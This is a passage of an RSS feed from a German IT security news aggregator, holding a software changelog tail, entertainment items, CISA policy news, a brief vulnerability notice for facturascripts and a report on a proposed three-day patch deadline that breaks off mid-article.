<li>docs: update Craft CMS quickstart, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2925397626" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7107" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7107/hovercard" href="https://github.com/ddev/ddev/pull/7107">#7107</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2955966296" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7160" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7160/hovercard" href="https://github.com/ddev/ddev/pull/7160">#7160</a></li>
<li>feat: backdrop add bee to quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900874577" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7053" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7053/hovercard" href="https://github.com/ddev/ddev/pull/7053">#7053</a></li>
<li>build: bump actions/setup-python from 5.4.0 to 5.5.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960810314" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7173" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7173/hovercard" href="https://github.com/ddev/ddev/pull/7173">#7173</a></li>
<li>fix: show router URLs in <code>ddev describe</code> and <code>ddev list</code> when ephemeral by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2952486823" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7152" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7152/hovercard" href="https://github.com/ddev/ddev/pull/7152">#7152</a></li>
<li>build: bump XHGui image to 0.23, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2945918094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7142" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7142/hovercard" href="https://github.com/ddev/ddev/pull/7142">#7142</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956515643" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7161" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7161/hovercard" href="https://github.com/ddev/ddev/pull/7161">#7161</a></li>
<li>feat: Implement amplitude tracking for xhprof_mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7169" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7169/hovercard" href="https://github.com/ddev/ddev/issues/7169">#7169</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2961063293" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7175" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7175/hovercard" href="https://github.com/ddev/ddev/pull/7175">#7175</a></li>
<li>fix: delete third-party built images on <code>ddev delete</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2950084951" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7150" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7150/hovercard" href="https://github.com/ddev/ddev/pull/7150">#7150</a></li>
<li>test: Add OpenMage composer quickstart and tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2939890423" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7133" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7133/hovercard" href="https://github.com/ddev/ddev/pull/7133">#7133</a></li>
<li>build: bump images to v1.24.4 for release, and docker-compose to v2.34.0, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2938725637" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7131" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7131/hovercard" href="https://github.com/ddev/ddev/issues/7131">#7131</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956556885" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7162" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7162/hovercard" href="https://github.com/ddev/ddev/pull/7162">#7162</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918705956" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7080/hovercard" href="https://github.com/ddev/ddev/pull/7080">#7080</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2919875466" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7084" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7084/hovercard" href="https://github.com/ddev/ddev/pull/7084">#7084</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2929100589" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7119" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7119/hovercard" href="https://github.com/ddev/ddev/pull/7119">#7119</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shelane/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shelane">@shelane</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2943672044" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7140" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7140/hovercard" href="https://github.com/ddev/ddev/pull/7140">#7140</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PierrePaul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PierrePaul">@PierrePaul</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2958897102" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7168" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7168/hovercard" href="https://github.com/ddev/ddev/pull/7168">#7168</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2916743723" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7076" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7076/hovercard" href="https://github.com/ddev/ddev/pull/7076">#7076</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.3...v1.24.4"><tt>v1.24.3...v1.24.4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Arcade: „Nick Jr. Replay!“ und weitere Spiele sind gestartet]]></title>
<description><![CDATA[Es gibt Neuheiten auf Apple Arcade. Ab sofort stehen vier neue Spiele auf der Apple Spiele-Abo-Plattform bereit. zu „Nick Jr. Replay!“ gesellen sich Good Pizza, Great Pizza+, Perchang World und Ultimate 8 Ball Pool+. Vier neue Spiele auf Apple Arcade Ab sofort stehen neue Spiele auf Apple Arcade ...]]></description>
<link>https://tsecurity.de/de/3496987/ios-mac-os/apple-arcade-nick-jr-replay-und-weitere-spiele-sind-gestartet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496987/ios-mac-os/apple-arcade-nick-jr-replay-und-weitere-spiele-sind-gestartet/</guid>
<pubDate>Thu, 07 May 2026 19:56:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Es gibt Neuheiten auf Apple Arcade. Ab sofort stehen vier neue Spiele auf der Apple Spiele-Abo-Plattform bereit. zu „Nick Jr. Replay!“ gesellen sich Good Pizza, Great Pizza+, Perchang World und Ultimate 8 Ball Pool+. Vier neue Spiele auf Apple Arcade Ab sofort stehen neue Spiele auf Apple Arcade bereit. Highlight für den Familienspaß ist sicherlich […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Amy Adams faces Javier Bardem's Max Cady in Apple TV 'Cape Fear' trailer]]></title>
<description><![CDATA[Apple's first trailer for "Cape Fear" turns the classic thriller into a darker psychological horror series led by Amy Adams, Javier Bardem, and Patrick Wilson for Apple TV.Javier Bardem in "Cape Fear"Apple has unveiled a darker TV adaptation of "Cape Fear," set to premiere on June 5, 2026, on App...]]></description>
<link>https://tsecurity.de/de/3496407/ios-mac-os/amy-adams-faces-javier-bardems-max-cady-in-apple-tv-cape-fear-trailer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3496407/ios-mac-os/amy-adams-faces-javier-bardems-max-cady-in-apple-tv-cape-fear-trailer/</guid>
<pubDate>Thu, 07 May 2026 16:42:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's first trailer for "Cape Fear" turns the classic thriller into a darker psychological horror series led by Amy Adams, Javier Bardem, and Patrick Wilson for <a href="https://appleinsider.com/inside/apple-tv" title="Apple TV" data-kpt="1">Apple TV</a>.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67569-142365-IMG_6910-xl.jpg" alt="Muscular shirtless man with extensive tattoos stands in a hospital room, arms outstretched, facing forward against green privacy curtains and medical equipment in the background"><br><span>Javier Bardem in "Cape Fear"</span></div><br>Apple has unveiled a darker TV adaptation of "Cape Fear," set to premiere on June 5, 2026, on Apple TV. The 10-episode series stars Amy Adams, Javier Bardem, and Patrick Wilson, with Nick Antosca as the creator and showrunner.<br><br>With Martin Scorsese and Steven Spielberg as executive producers, this adaptation promises a gripping experience for viewers.<br><br><br> <a href="https://appleinsider.com/articles/26/05/07/amy-adams-faces-javier-bardems-max-cady-in-apple-tv-cape-fear-trailer?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244262?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Launches CI Fortify to Defend Critical Infrastructure From Nation-State Cyber Threats]]></title>
<description><![CDATA[The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has launched a new initiative called “CI Fortify” aimed at helping critical infrastructure operators prepare for disruptive cyberattacks linked to geopolitical conflicts. The initiative comes amid growing concerns over nation-state ...]]></description>
<link>https://tsecurity.de/de/3494764/it-security-nachrichten/cisa-launches-ci-fortify-to-defend-critical-infrastructure-from-nation-state-cyber-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3494764/it-security-nachrichten/cisa-launches-ci-fortify-to-defend-critical-infrastructure-from-nation-state-cyber-threats/</guid>
<pubDate>Thu, 07 May 2026 07:53:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CI Fortify" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA.webp 1376w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-1140x636.webp 1140w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA.webp 1376w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/CI-Fortify-CISA-1140x636.webp 1140w" sizes="(max-width: 1376px) 100vw, 1376px" title="CISA Launches CI Fortify to Defend Critical Infrastructure From Nation-State Cyber Threats 1"></p>The U.S. Cybersecurity and Infrastructure Security Agency (<a href="https://thecyberexpress.com/?s=CISA" target="_blank" rel="noopener">CISA</a>) has launched a new initiative called “CI Fortify” aimed at helping <a href="https://thecyberexpress.com/hacktivist-attacks-on-critical-infrastructure/" target="_blank" rel="noopener">critical infrastructure</a> operators prepare for disruptive cyberattacks linked to geopolitical conflicts. The initiative comes amid growing concerns over nation-state cyber threats targeting operational technology (OT) systems that support essential services across the United States.

The CI Fortify initiative focuses on improving <a href="https://thecyberexpress.com/cyber-resilience-in-healthcare/" target="_blank" rel="noopener">critical infrastructure resilience</a> through two key objectives: isolation and recovery. CISA said the effort is designed to help operators maintain essential operations even if adversaries compromise telecommunications networks, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="28143">internet</a> services, or industrial control systems.

According to the agency, nation-state actors are no longer limiting their activities to espionage. Instead, <a href="https://thecyberexpress.com/ios-exploit-kit-dubbed-darksword/" target="_blank" rel="noopener">threat groups</a> have increasingly been pre-positioning themselves inside critical infrastructure environments to potentially disrupt or destroy systems during future geopolitical conflicts.
<h2>CI Fortify Initiative Focuses on Isolation and Recovery</h2>
Under the CI Fortify initiative, CISA is urging critical infrastructure organizations to assume that third-party communications and service providers may become unreliable during a crisis. Operators are also being asked to plan under the assumption that threat actors may already have some level of access to OT networks.

Nick Andersen, Acting Director at CISA, <a href="https://www.cisa.gov/topics/industrial-control-systems/ci-fortify" target="_blank" rel="nofollow noopener">emphasized</a> the need for organizations to prepare for worst-case operational scenarios.

“In a geopolitical crisis, the critical infrastructure organizations Americans rely on must be able to continue delivering, at a minimum, crucial services,” Andersen said. “They must be able to isolate vital systems from harm, continue operating in that isolated state, and quickly recover any systems that an adversary may successfully compromise.”

The isolation strategy outlined under CI Fortify involves proactively disconnecting operational technology systems from external business networks and third-party connections. CISA said this approach is intended to prevent <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28141">cyber</a> impacts from spreading into OT environments while allowing organizations to continue delivering essential services in a degraded communications environment.

The agency advised operators to identify critical customers, including military infrastructure and other lifeline services, and determine the minimum operational capabilities needed to support them during emergencies.

CISA also recommended updating engineering processes and business continuity plans to support safe operations for extended periods while systems remain isolated.
<h2>Recovery Planning Central to Critical Infrastructure Resilience</h2>
Alongside isolation, the CI Fortify initiative places strong emphasis on recovery planning. CISA urged operators to maintain updated system documentation, create secure <a href="https://thecyberexpress.com/cve-2026-27944-nginx-ui-backup-vulnerability/" target="_blank" rel="noopener">backups</a> of critical files, and regularly practice system replacement or manual operational transitions.

The agency noted that organizations should also identify communications dependencies that could complicate recovery efforts, such as licensing servers, <a href="https://thecyberexpress.com/cve-2025-30406-and-cve-2025-29824/" target="_blank" rel="noopener">remote vendor access</a>, or upstream network connections.

CISA encouraged operators to work closely with managed service providers, system integrators, and vendors to understand potential failure points and establish alternative recovery pathways.

The initiative also highlights broader benefits of emergency planning beyond <a href="https://thecyberexpress.com/why-we-should-disclose-cybersecurity-incidents/" target="_blank" rel="noopener">cybersecurity incidents</a>. According to CISA, the same planning processes can help organizations maintain operations during weather-related disruptions, equipment failures, and safety emergencies.

The agency said isolation planning can help cut off command-and-control access to compromised systems, while strong recovery preparation can reduce <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="28140">incident response</a> costs and shorten recovery timelines.
<h2>Security Vendors and Service Providers Asked to Support CI Fortify</h2>
The CI Fortify initiative extends beyond infrastructure operators and calls on <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28139">cybersecurity</a> vendors, industrial automation suppliers, and managed service providers to support resilience planning efforts.

Industrial control system vendors are being encouraged to identify barriers that could interfere with isolation and recovery procedures, including licensing restrictions and server dependency issues.

Managed service providers and integrators are expected to assist organizations in engineering updates, local backup collection, and recovery documentation planning.

Meanwhile, <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28142">security</a> vendors are being asked to support threat monitoring and provide intelligence if nation-state actors shift from espionage-focused activity to destructive cyber operations.

CISA also requested vendors share information related to tactics that could undermine recovery or bypass isolation protections, including malicious firmware updates and <a href="https://thecyberexpress.com/?s=vulnerabilities" target="_blank" rel="noopener">vulnerabilities</a> affecting software-based data diodes.
<h2>Volt Typhoon Cyberattacks Continue to Shape U.S. Cybersecurity Strategy</h2>
The launch of CI Fortify is closely tied to ongoing concerns surrounding the <a href="https://thecyberexpress.com/volt-typhoon-us-espionage-campaign/" target="_blank" rel="noopener">Volt Typhoon cyberattacks</a>, which U.S. officials have linked to Chinese state-sponsored threat actors.

CISA’s initiative specifically references the Volt Typhoon campaign as an example of how <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" target="_blank" rel="nofollow noopener">adversaries</a> have attempted to establish long-term access inside U.S. critical infrastructure systems to potentially support disruptive actions during military conflicts.

The Volt Typhoon operation first became public in 2023, when U.S. authorities <a href="https://thecyberexpress.com/chinese-espionage-volt-typhoon-targets-us/" target="_blank" rel="noopener">revealed</a> that Chinese hackers had infiltrated multiple sectors of American critical infrastructure.

Former CISA Director Jen Easterly stated in 2024 that the agency had identified and removed <a href="https://thecyberexpress.com/?s=Volt+Typhoon+campaign+" target="_blank" rel="noopener">Volt Typhoon intrusions</a> across several sectors. She later reiterated in 2025 that efforts continued to focus on identifying and evicting Chinese cyber actors from critical infrastructure environments.

Despite these operations, cybersecurity researchers and some government officials have warned that Chinese threat actors may still retain access to portions of critical infrastructure networks. Several experts have argued that nation-state groups remain deeply embedded in certain environments despite years of remediation efforts.

With the CI Fortify initiative, CISA appears to be shifting focus toward operational resilience, recognizing that prevention alone may not be sufficient against sophisticated nation-state cyber threats targeting U.S. critical infrastructure.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie die Cloud zum Produktivitätsfaktor wird]]></title>
<description><![CDATA[Dokumentenprozesse sind in vielen Unternehmen noch immer durch Medienbrüche, manuelle Abläufe und fragmentierte Systeme geprägt. Gleichzeitig steigen die Anforderungen an Geschwindigkeit, Transparenz und Compliance. 

Tags: #Cloud Computing | #Dokumentenmanagement | #Drucker]]></description>
<link>https://tsecurity.de/de/3491284/it-security-nachrichten/wie-die-cloud-zum-produktivitaetsfaktor-wird/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3491284/it-security-nachrichten/wie-die-cloud-zum-produktivitaetsfaktor-wird/</guid>
<pubDate>Wed, 06 May 2026 05:39:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover.jpg" class="attachment-full size-full wp-post-image" alt="Dietmar Nick, CEO von Kyocera Document Solutions Deutschland" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/01/Kyocera_Cover-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Wie die Cloud zum Produktivitätsfaktor wird 1"></p>
    Dokumentenprozesse sind in vielen Unternehmen noch immer durch Medienbrüche, manuelle Abläufe und fragmentierte Systeme geprägt. Gleichzeitig steigen die Anforderungen an Geschwindigkeit, Transparenz und Compliance. 

<p>Tags: <a href="https://www.it-daily.net/thema/cloud-computing">#Cloud Computing</a> | <a href="https://www.it-daily.net/thema/dokumentenmanagement">#Dokumentenmanagement</a> | <a href="https://www.it-daily.net/thema/drucker">#Drucker</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32699 | NeoRazorX facturascripts up to 2025.92 User Interface nick external control of assumed-immutable web parameter (EUVD-2026-27438)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in NeoRazorX facturascripts up to 2025.92. The impacted element is an unknown function of the component User Interface. This manipulation of the argument nick causes external control of assumed-immutable web parameter.

This vulnerability is...]]></description>
<link>https://tsecurity.de/de/3490921/sicherheitsluecken/cve-2026-32699-neorazorx-facturascripts-up-to-202592-user-interface-nick-external-control-of-assumed-immutable-web-parameter-euvd-2026-27438/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490921/sicherheitsluecken/cve-2026-32699-neorazorx-facturascripts-up-to-202592-user-interface-nick-external-control-of-assumed-immutable-web-parameter-euvd-2026-27438/</guid>
<pubDate>Tue, 05 May 2026 23:42:25 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/neorazorx:facturascripts">NeoRazorX facturascripts up to 2025.92</a>. The impacted element is an unknown function of the component <em>User Interface</em>. This manipulation of the argument <em>nick</em> causes external control of assumed-immutable web parameter.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-32699">CVE-2026-32699</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA mulls new three-day remediation deadline for critical flaws]]></title>
<description><![CDATA[Experts have mixed reactions to a report that the US Cybersecurity and Infrastructure Security Agency (CISA) is considering reducing the timeline in which government agencies must address critical vulnerabilities from two weeks to only three days.



The current 14-day window applies to high-seve...]]></description>
<link>https://tsecurity.de/de/3490740/it-security-nachrichten/cisa-mulls-new-three-day-remediation-deadline-for-critical-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490740/it-security-nachrichten/cisa-mulls-new-three-day-remediation-deadline-for-critical-flaws/</guid>
<pubDate>Tue, 05 May 2026 21:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Experts have mixed reactions to a report that the US Cybersecurity and Infrastructure Security Agency (CISA) is considering reducing the timeline in which government agencies must address critical vulnerabilities from two weeks to only three days.</p>



<p>The current 14-day window applies to high-severity flaws dating from 2021 onwards, listed as known to be under exploit in CISA’s <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank" rel="noreferrer noopener">Known Exploited Vulnerabilities</a> <strong>(</strong>KEV) Catalog.</p>



<p>According <a href="https://www.reuters.com/legal/litigation/us-officials-weigh-cutting-deadlines-fix-digital-flaws-amid-worries-over-ai-2026-05-01/" target="_blank" rel="noreferrer noopener">to a Reuters</a> report citing two unnamed sources, this might be reduced to 72 hours amid growing concern that AI models such as Anthropic’s <a href="https://www.csoonline.com/article/4162259/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox.html" target="_blank">Claude Mythos</a> (which, according to a <a href="https://www.csoonline.com/article/4163316/cisa-last-in-line-for-access-to-anthropic-mythos-3.html" target="_blank">recent report</a>, CISA has not yet had access to) will accelerate the ability of attackers to uncover and exploit the most serious flaws.</p>



<p>This potential reduction remains an unconfirmed discussion point, and no timeline for the introduction of an alteration has been proposed. However, in a signal that any change will have weight behind it, decision makers involved include <a href="https://www.linkedin.com/in/nmandersen/" target="_blank" rel="noreferrer noopener">Nick Andersen</a>, the acting chief of the Cybersecurity and Infrastructure Security Agency, and <a href="https://en.wikipedia.org/wiki/Sean_Cairncross" target="_blank" rel="noreferrer noopener">Sean Cairncross</a>, US national cyber director, Reuters said.</p>



<h2 class="wp-block-heading">CISA’s current requirements</h2>



<p>CISA’s current remediation deadlines depend on a flaw’s severity, which is influenced by a range of factors. The most urgent category, zero-days — vulnerabilities known to be under exploitation, but which lack an available patch — are covered by <a href="https://www.cisa.gov/news-events/directives" target="_blank" rel="noreferrer noopener">Emergency Directives</a> that require remediation within 24 to 72 hours.</p>



<p>Next are the 14-day KEV Catalogue vulnerabilities under Binding Operational Directives (<a href="https://www.cisa.gov/news-events/directives/bod-22-01-reducing-significant-risk-known-exploited-vulnerabilities" target="_blank" rel="noreferrer noopener">BOD 22-01</a>). In addition to being under active exploitation, a vulnerability in this category must have a CVE identifier and an available patch or workaround.</p>



<p>Underlining the urgency, threat intelligence platform VulnCheck recently reported that <a href="https://www.vulncheck.com/blog/state-of-exploitation-2026" target="_blank" rel="noreferrer noopener">29% of KEV-level vulnerabilities</a> in 2025 showed evidence of exploitation on or before the day the CVE was published.</p>



<p>Critical vulnerabilities not known to be under active exploitation, on the other hand, are categorized under <a href="https://www.cisa.gov/news-events/directives/bod-19-02-vulnerability-remediation-requirements-internet-accessible-systems" target="_blank" rel="noreferrer noopener">BOD 19-02</a>, which allows for a remediation timeline of between 15 and 30 days, depending on the CVSS score.  </p>



<p>Moving to 72-hour remediation would mark a huge change in workload for security teams inside US government agencies. It might also set a new benchmark for best practice in the private sector. The question is whether applying fixes or remediation within three days is a practical goal.</p>



<h2 class="wp-block-heading">Tight window</h2>



<p>A CISA spokesperson declined to comment on the Reuters report, but security experts were more forthcoming, with most believing the idea is simply an acknowledgement that modern vulnerability management is evolving.</p>



<p>One source of anxiety was that a three-day timeline would leave little time for meaningful testing, normally a time-consuming and complex undertaking that ensures that a patch, remediation, or workaround doesn’t break any of the systems around it.</p>



<p>“No responsible IT team is going to release patches without proper testing. Even for critical vulnerabilities, 2-3 days is an extremely tight window, especially if they involve complex systems and require wide distribution,” said <a href="https://www.linkedin.com/in/william-wright-chcsp-2054a72a/?originalSubdomain=uk" target="_blank" rel="noreferrer noopener">William Wright</a> of UK penetration testing company Closed Door Security.</p>



<p>“Claude Mythos is a source code reviewer and it doesn’t actively exploit vulnerabilities in the wild. While the model is powerful and could turn up flaws faster, forcing IT teams to respond more rapidly will only lead to poorly-tested stopgaps and cause further problems down the line.”</p>



